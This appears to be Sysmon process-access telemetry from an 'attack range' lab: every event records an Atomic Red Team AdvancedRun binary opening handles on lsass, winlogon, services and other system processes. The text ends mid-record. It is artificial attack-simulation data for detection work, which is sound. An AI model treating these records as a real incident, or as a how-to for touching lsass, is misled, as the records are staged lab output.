17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983915Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983914Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983913Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983876Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983875Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983874Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983873Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983872Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983871Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)A